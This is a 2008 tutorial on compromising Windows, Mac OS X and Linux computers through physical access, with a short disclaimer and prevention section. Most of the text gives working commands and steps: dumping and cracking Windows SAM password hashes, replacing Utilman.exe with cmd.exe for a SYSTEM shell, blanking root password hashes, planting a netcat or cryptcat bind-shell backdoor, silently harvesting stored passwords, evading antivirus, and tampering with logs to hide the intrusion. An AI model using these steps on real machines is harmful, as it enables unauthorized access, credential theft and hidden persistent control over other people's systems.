Hacking Your Computer – Physical Access is Total Access

Table of Contents
-Disclaimer
-Introduction
Part 1: Gaining Access
-LiveCDs
-Windows Option 1: Cracking the Password
-Windows Option 2: Circumventing the Password
-Windows Option 3: Utilman privilege escalation exploit
-MacOSX: Single User Mode
-Linux: /etc/passwd and /etc/shadow
Part 2: Exploiting the System
-Harvesting Information
-Backdoors and Rootkits
Part 3: Conclusion
-Cleaning Up Your Tracks
-How to Prevent These Attacks
-Conclusion
-Tools/Reading Material
————-
Disclaimer
————-
This article is intended as a basic overview of techniques to compromise computers given physical access. Most of this information is already easily available online, but I thought putting it all in one place and explaining the tehnichse and tools in a concise way would be a worthwhile endeavor. The text of this article is entirely my own. Hopefully, this could serve as an introduction for someone who is just starting out and might give some ideas about where to go next. This is not intended to be an in-depth guide to any of the specific techniques or tools mentioned in the article, but hopefully I’ve included enough explanation for basic understanding of what’s going on. This article may be re-published without permission, provided my name remains on it. As computer security is a rapidly changing field, the contents of this article are relevant today (7/12/2008), but may be out of date in the near future. However, the general principles of these attacks will most likely remain the same. This article is intended for educational use only. The attacks included should only be attempted with permission from the owner of the target system. Gaining unauthorized access to a computer system is a felony, and I am not responsible for any damage caused by the use of these techniques.
—————
Introduction
—————
A cardinal rule of computer security is that once an attacker has acquired physical access to a machine, it is generally trivial for that attacker to fully compromise the system. As technology improves, this is becoming less the case, but for now, if an attacker has physical access to a machine, the attacker can generally breach its security.
Part 1: Gaining Access
———–
LiveCDs
———–
A LiveCD is a complete (sometimes extremely minimal) operating system that can be run straight from a CD (or a USB drive). Simply pop in the CD before booting, turn on the computer, tell it to boot from CD (on my machine, you can bring up a boot menu by pressing F12), and go.
My LiveCD of choice is BackTrack

Remote-Exploit.org – Supplying offensive security products to the world
http://www.remote-exploit.org/backtrack.html

It is a LiveCD designed for security and penetration testing, so it comes bundled with dozens of powerful programs that every security expert should have. The LiveCD can be invaluable in bypassing operating sytem security because it generally allows a user to access the partitions of the harddrive without actually running the native operating system. What this means is that if you just want access to the files on a machine, you can stop reading here: just boot to a LiveCD, navigate to the proper partition, and enjoy full file access. However, actually gaining access to the programs, services, and information stored on a computer may be more complicated, and is dependent on the operating system. I will briefly cover basic tactics for gaining administrative access to Windows, MacOS, and many versions of Linux.
—————————————————-
Windows Option 1: Cracking the Password
—————————————————-
On most Windows operating systems, user information and passwords are stored in what is called a SAM file. This file is typically stored in “WINDOWS/System32/config/SAM”, but is not accessible when Windows is running. The file itself is encrypted with a key stored in “WINDOWS/System32/config/system”, which is also not accessible when Windows is running. However, by booting to a LiveCD, these files can be accessed, and with the proper tools, decryption of the SAM file and decryption of the passwords stored within is possible. For this example, I booted the target Windows machine using BackTrack 3. First, I opened up a terminal and navigated to the directory containing the SAM and system key, and then copied them to a temp directory. Then, I navigated to the temp directory and decrypted the SAM file using the bkhive and samdump2 tools, both of which are included in BackTrack. The harddrive in this instance was mounted as “hda2”, but this may vary.

# cd /mnt/hda2/WINDOWS/System32/config
# cp SAM /tmp
# cp system /tmp
# cd /tmp
# bkhive system key
# samdump2 SAM key > /tmp/passwords.txt

This results in the decrypted SAM file being stored as a text file called “passwords.txt”. Now, the passwords in this file must be decrypted to plaintext if they are to be usable. On Windows operating systems prior to Vista, the passwords in the SAM file are encrypted using a notoriously insecure hashing algorithm called LM (LanManager). On Vista, the SAM file is encrypted using the more secure NTLM algorithm. There are typically three approaches to decrypting these passwords: rainbow tables, wordlists, and brute-force. The detailed specifics of these approaches are beyond the scope of this article, but I will give a brief explanation on these methods. Rainbow tables use an algorithm based on chains of one-way hash functions to leverage increased pre-computing time to allow for fast password cracking. Rainbow tables are specially generated for a specific type of hash (MD5, LM, etc.), and can take anywhere from minutes to years to generate, but once they have been generated, they can be a powerful tool to quickly decrypt passwords. Included in BackTrack is RainbowCrack

http://www.antsight.com/zsl/rainbowcrack/

the standard tool for generating and utilizing rainbow tables for decryption. Pre-generated rainbow tables can be found – I recommend FreeRainbowTables

Free Rainbow Tables » Distributed Rainbow Cracking » LM, NTLM, MD5, SHA1, HALFLMCHALL, MSCACHE
http://www.freerainbowtables.com/

and the Shmoo Group

The Shmoo Group http://www.anonym.to/?http://rainbowtables.shmoo.com/

for tables.
Sample usage of rtgen for generating rainbow tables of LM hashes (this may take several hours):

# rtgen lm alpha 1 7 0 2100 8000000 all
# rtgen lm alpha 1 7 1 2100 8000000 all
# rtgen lm alpha 1 7 2 2100 8000000 all
# rtgen lm alpha 1 7 3 2100 8000000 all
# rtgen lm alpha 1 7 4 2100 8000000 all

Sample usage of RainbowCrack for using these rainbow tables to
decrypt our SAM passwords:

First sort the tables:
# rtsort lm_alpha#1-7_0_2100x8000000_all.rt
# rtsort lm_alpha#1-7_1_2100x8000000_all.rt
# rtsort lm_alpha#1-7_2_2100x8000000_all.rt
# rtsort lm_alpha#1-7_3_2100x8000000_all.rt
# rtsort lm_alpha#1-7_4_2100x8000000_all.rt
Next, crack the hashes:
# rcrack *.rt -f passwords.txt

If rainbow tables are not an option due to space constraints (the tables themselves can be enormous) or other reasons, my next preferred method is using a wordlist. Wordlists are readily available online and can allow for a dictionary attack: checking the hashes of every entry in the wordlist against the hashed password and looking for a match, which would yield the plaintext password. Wordlists vary from a simple lower-case dictionary to larger, more comprehensive combinations of uppercase, lowercase, numbers, and symbols. Using wordlists is a tradeoff – the larger the wordlist, the higher the chance of cracking the password, but the longer the cracking will take. My tool of choice for cracking passwords using wordlists is John the Ripper

http://www.openwall.com/john/

also included in BackTrack.

Sample usage of John the Ripper with a wordlist:
# john -w=[wordlist] -f=NT passwords.txt

If neither wordlists nor rainbow tables are an option, the last resort is a brute-force attack. Brute-forcing is trying literally every possible combination of letters, numbers, and symbols. Obviously, this technique is time-consuming, and sometimes prohibitively so. Often it would take years to brute-force a reasonably long, strong password. But for shorter passwords, this may be an option. Again, I prefer to use John the Ripper.

Sample usage of John the Ripper using brute-force:
# john –incremental:all -f=NT passwords.txt

———————————————————–
Windows Option 2: Circumventing the Password
———————————————————–
Sometimes, an attacker only desires access to the system but does not need the knowledge of the owner’s password. It is possible to completely circumvent the Windows login password by wiping out the password rather than cracking it. This is usually a much faster, easier process. In this attack, I typically boot the target Windows machine using BackTrack. Then, I navigate to the the “WINDOWS/System32/config” folder and make a backup of the user’s SAM and system files. This is for the purposes of covering my tracks and restoring the original passwords later. If an attacker were not concerned about stealth, then this step would be unnecessary. I backup the files to a USB drive that mounts as “sda1”. This may vary on your system.

# cd /mnt/hda2/WINDOWS/System32/config
# cp SAM /mnt/sda1/
# cp system /mnt/sda1/

Next, I reboot and boot to another of my favorite LiveCDs: the NT Password and Registry Editor

Offline NT Password & Registry Editor http://home.eunet.no/pnordahl/ntpasswd/

By navigating through the menus and following the instructions, it is trivial to reset a chosen user’s password or promote an existing user to Administrator privileges. When I am done using the system as an Administrator, I make sure to restore the user’s original SAM and system file, so there is no evidence of a password change.
——————————————————————-
Windows Option 3: Utilman privilege escalation exploit
——————————————————————-
Many Windows operating systems allow the running of a service called Utility Manager prior to actually logging in as a user. This program is executed with System privileges (a special level higher than Administrator), so with a LiveCD, it is possible to trick Windows into executing an arbitrary program with System privileges prior to logging in. In this example, I’ll get a root shell by tricking Windows into executing cmd.exe instead of utilman.exe. I boot up the target Windows machine with BackTrack, and navigate to “WINDOWS/System32”. Then I simply backup utilman.exe, and copy cmd.exe on top of utilman.exe.

# cd /mnt/hda2/Windows/System32/
# mv Utilman.exe Utilman.backup
# cp cmd.exe Utilman.exe
# reboot

Then, simply boot the system to Windows, and press Windows + U to open up a command prompt with System privileges. (Note: this method of exploitation may soon be patched.)
———————————-
MacOSX: Single User Mode
———————————-
To boot a Mac into “Single User mode”, simply boot the computer and press Apple + S when blue first shows up on the screen. Next, mount the harddrive, and either dump the password and crack it with a tool like John the Ripper, or simply overwrite the root password:

# /sbin/mount -wu /
# /sbin/SystemStarter
To dump the existing root password:
# nidump passwd
To create a new root password:
# passwd root

——————————————-
Linux: /etc/passwd and /etc/shadow
——————————————-
On most Linux operating systems, password information is stored at /etc/passwd. A sample entry might look like:

root:x:0:0:root:/root:/bin/bash

This is the information for the root user account. The “x” indicates that the password is encrypted and stored in /etc/shadow. The corresponding shadow entry might look like:

root:[hash].:14001:0:99999:7:::

This entry contains information on permissions for this user as well
as a hashed password. However, depending on the distribution, Linux
operating systems typically use much more secure hashing functions
including salt values, so decrypting these passwords is not typically
feasible.
Instead, an attacker can reset the password by simply running
BackTrack and checking the /etc/passwd file. If there is an “x”
in the password spot, open the /etc/shadow file and delete the
password hash between the colons. If the hash is in the /etc/passwd
file, simply delete the hash in that file. Then, reboot and login as
root with no password.
Part 2: Exploiting the System
—————————–
Harvesting Information
—————————–
Once an attacker has gained access to a machine, he or she is now able to begin harvesting information from the system. Most operating systems have features to store passwords for wireless settings, and many web browsers will store passwords and reveal them if prompted. In addition, tools such as keyloggers may be installed to provide continued information theft after the attacker has left. There are many tools that are helpful in automatically dumping private information from a system. On Windows, my favorite is a USB application called the “USB Switchblade”. I prefer GonZor’s version

Account Suspended http://gonzor228.com/

This tool can be used to stealthily dump information on a system that you have access to, but I use it for all my information gathering needs. It supports the ability to dump Windows passwords, browser passwords, wireless passwords, and much more. In addition, it allows you to silently install the VNC remote desktop tool, which will open up a port (usually 5800) that can be accessed in a browser for complete remote control. This segues nicely into the next section…
——————————
Leaving the Door Open
——————————
In addition to stealing information from the user, many attackers prefer to set up some sort of backdoor to allow future access to the system remotely. My personal favorite is NetCat

The GNU Netcat — Official homepage http://netcat.sourceforge.net/

which has been called the “Swiss army knife of network tools”. NetCat is a simple utility that can open ports on a machine for listening for remote connections, and bind those ports to programs. For example, on a Windows machine I might run the following command (in the directory that contains my NetCat executable):

nc -l -p[port] -d -e cmd.exe -L

This opens a port on [port] for listening for a remote connection, and when a connection is made, it binds cmd.exe to the input and output of that connection, allowing a remote user to execute commands. Because using NetCat in such a manner leaves an open door that any attacker could take advantage of, I prefer to use a modification of NetCat called CryptCat

cryptcat – encrypting netcat | Get cryptcat – encrypting netcat at SourceForge.net  http://sourceforge.net/projects/cryptcat/

which allows for password protection and encrypted channels using a
“-k” parameter to set the password:

cryptcat -l -p[port] -k[password] -d -e cmd.exe -L

Then, on my remote machine, I connect to the open port to gain
access:

cryptcat [target IP] [port] -k [password]

These tools are available cross-platform, increasing their versatility. However, there are dozens of rootkits and backdoors available for free use. Most are easily detectable by anti-virus software, so I recommend coding your own backdoors or learning how to camouflage software to evade anti-virus detection.

Conclusion
——————————-
Cleaning Up Your Tracks
——————————-
One of the more difficult tasks for any attacker is leaving behind no evidence of the infiltration. In general, it is common practice to backup any files related to passwords before modifying them, and to restore these files after the attack is finished. Installing a backdoor is probably the most difficult challenge for the attacker, because it involves leaving many clues behind. If a user detects that a backdoor exists, then it will be quickly closed. Popular techniques to ensure successful backdoors include piggy-backing on  existing network applications (to use an already open port), masquerading the process as a system service and hiding the execution of the process from utilities such as the task manager, and installing the backdoor to execute on startup. These topics are highly operating system dependent and go beyond the scope of this article. Finally, many operating systems keep logs of when users access the system and run programs, so these logs should be located and modified from LiveCD at the conclusion of an attack.
————————————-
How to Prevent These Attacks
————————————-
There are a number of simple steps a user can take to mitigate the risk of attacks via physical access. Obviously, the first and most important of these is to not allow physical access to a system by an attacker. The cardinal rule that physical access equals total access exists for a reason. However, there are additional security measures that can be taken. Harddrive encryption is an emergent technology that prevents the mounting and reading of material without proper authentication. There are advanced methods of circumventing disk encryption, but this preventative measure will prevent almost all attacks of this kind. Also, it is good practice to enable a BIOS or firmware password on your system. This will prevent booting to a LiveCD or running other malicious software on a system. Password strength is also very important: strong passwords contain lowercase letters, uppercase letters, numbers, and symbols, and are at least 8 characters long. Having strong passwords seriously mitigates the risk of having the password cracked via wordlist or rainbow tables, and makes the use of brute-force infeasible. Finally, in Windows, make sure to disable the LM hashing protocol if possible, in favor of the more secure NTLM hash.
————–
Conclusion
————–
Thank you for taking the time to read this article. I hope it will be useful to someone.
Tools/Reading Material
BackTrack 3 –

Remote-Exploit.org – Supplying offensive security products to the world http://www.remote-exploit.org/backtrack.html

CryptCat –

http://sourceforge.net/projects/cryptcat/

Free Rainbow Tables –

http://rainbowtables.shmoo.com/

John the Ripper –

http://www.openwall.com/john/

NetCat –

http://netcat.sourceforge.net/

NT Password and Registry Editor –

Offline NT Password & Registry Editor http://home.eunet.no/pnordahl/ntpasswd/

RainbowCrack –

http://www.antsight.com/zsl/rainbowcrack/

Shmoo Group Rainbow Tables –

rainbowtables http://rainbowtables.shmoo.com/